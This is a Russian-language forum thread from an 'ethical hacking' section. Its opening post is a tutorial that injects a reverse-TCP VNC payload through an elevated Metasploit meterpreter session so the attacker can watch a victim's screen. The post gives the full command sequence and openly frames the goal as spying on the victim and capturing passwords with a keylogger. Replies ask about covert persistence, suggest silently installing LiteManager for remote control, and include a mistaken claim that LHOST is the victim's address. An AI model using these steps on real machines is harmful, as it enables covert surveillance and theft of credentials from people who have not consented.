Захват VNC сессии на удаленном компьютере.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 7 сен 2016.

Наш партнер Genesis Hackspace
  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    666
    Симпатии:
    1.123
    Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

    Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

    Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

    Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

    Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

    Захват VNC сессии на удаленном компьютере.

    (с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

    > use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Захват VNC сессии на удаленном компьютере.

    Убеждаемся, что все идет успешно:

    Захват VNC сессии на удаленном компьютере.

    В результате этих действий будет открыто окно VNC – сервера:

    Захват VNC сессии на удаленном компьютере.

    На этом все, вопросы и пожелания жду в комментариях.
     
    #1 Vander, 7 сен 2016
    Последнее редактирование: 7 сен 2016
    ghost, BaJIepraH, ~~DarkNode~~ и ещё 1-му нравится это.
  2. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Регистрация:
    28 фев 2016
    Сообщения:
    487
    Симпатии:
    262
    збс, лес как у меня на обоях :)
     
  3. IronBird

    IronBird Member

    Регистрация:
    14 авг 2016
    Сообщения:
    13
    Симпатии:
    5
    Так может это и твой стол?)
     
    Vander нравится это.
  4. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Регистрация:
    28 фев 2016
    Сообщения:
    487
    Симпатии:
    262
    точно :) спалился
     
  5. Алёша

    Алёша New Member

    Регистрация:
    15 сен 2016
    Сообщения:
    1
    Симпатии:
    0
    кто нибудь знает как беспалевно вживить payload на постоянно?
     
  6. WebWare Team

    WebWare Team Администратор
    Команда форума

    Регистрация:
    30 дек 2015
    Сообщения:
    483
    Симпатии:
    357
    Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
     
    Vander нравится это.
  7. Triton

    Triton Active Member

    Регистрация:
    1 окт 2016
    Сообщения:
    41
    Симпатии:
    35
    В отрытой сессии пейлоада:
    Пропишет нагрузку как сервис.
    Справка:
     
    m0tion нравится это.
  8. Ishikawa

    Ishikawa Well-Known Member
    Команда форума Grey Team

    Регистрация:
    15 ноя 2016
    Сообщения:
    105
    Симпатии:
    113
    Под винду можно LiteManager Server ставить с ключем /silent
    Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
    И можно не только смотреть, но и управлять, режимов масса.
     
    kot-gor, BaJIepraH и Vander нравится это.
  9. OmeN

    OmeN New Member

    Регистрация:
    21 мар 2017
    Сообщения:
    1
    Симпатии:
    0
    я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
     
  10. ghostphisher

    ghostphisher Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 дек 2016
    Сообщения:
    1.224
    Симпатии:
    857
    Это надо вводить в msf консоль
    сначало msfconsole запускаем.
     
  11. asshole

    asshole New Member

    Регистрация:
    25 мар 2017
    Сообщения:
    4
    Симпатии:
    0
    Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
     
  12. DSW

    DSW Well-Known Member

    Регистрация:
    20 мар 2017
    Сообщения:
    58
    Симпатии:
    13
    set LHOST ip атакующего это твой ip например 192.168.1.100
    ip жертвы это тот кого собираешься атаковать например 1.1.1.1
     
  13. asshole

    asshole New Member

    Регистрация:
    25 мар 2017
    Сообщения:
    4
    Симпатии:
    0
    use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Какая команда указывает жертву?
     
  14. DSW

    DSW Well-Known Member

    Регистрация:
    20 мар 2017
    Сообщения:
    58
    Симпатии:
    13
    Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
     
  15. asshole

    asshole New Member

    Регистрация:
    25 мар 2017
    Сообщения:
    4
    Симпатии:
    0
    Спс. Ip серый или белый?
     
  16. Chena

    Chena Member

    Регистрация:
    10 фев 2017
    Сообщения:
    12
    Симпатии:
    4
    Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
     
Загрузка...

Поделиться этой страницей